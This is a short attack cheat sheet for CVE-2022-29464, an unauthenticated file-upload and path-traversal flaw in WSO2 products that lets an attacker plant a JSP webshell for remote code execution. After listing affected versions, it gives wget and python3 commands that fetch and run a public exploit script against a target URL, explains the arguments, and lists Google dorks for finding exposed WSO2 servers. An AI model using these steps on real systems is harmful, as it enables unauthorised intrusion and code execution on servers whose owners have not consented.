WSO2 RCE (CVE-2022-29464)
Critical vulnerability in WSO2 products, discovered by Orange Tsai. It is an unauthenticated, unrestricted arbitrary file upload: the /fileupload servlet accepts a multipart request whose Content-Disposition carries a ../ directory traversal sequence, so an unauthenticated attacker can write a malicious JSP into a directory under the web root (for example repository/deployment/server/webapps/) and then request it to get RCE as the WSO2 service user. Affected: WSO2 API Manager 2.2.0 up to 4.0.0, Identity Server 5.2.0 up to 5.11.0, Identity Server as Key Manager 5.3.0 up to 5.11.0, Enterprise Integrator 6.2.0 up to 6.6.0, and the related Identity Server Analytics and Open Banking AM/KM releases listed in the advisory.
https://github.com/hakivvi/CVE-2022-29464
wget https://raw.githubusercontent.com/hakivvi/CVE-2022-29464/main/exploit.py -O wso2.py
python3 wso2.py https://wso2.company.com clg.jsp
The first argument is the base URL of the target (the Carbon HTTPS port, 9443 by default, unless it is behind a reverse proxy); the second is the name the uploaded JSP will get, which the exploit then reaches under /authenticationendpoint/.
Google Dorks:
inurl:"/carbon/admin/login.jsp"
inurl:"/authenticationendpoint/login.do"
inurl:"devportal/apis"
intitle:"API Publisher- Login"
intitle:"WSO2 Management Console"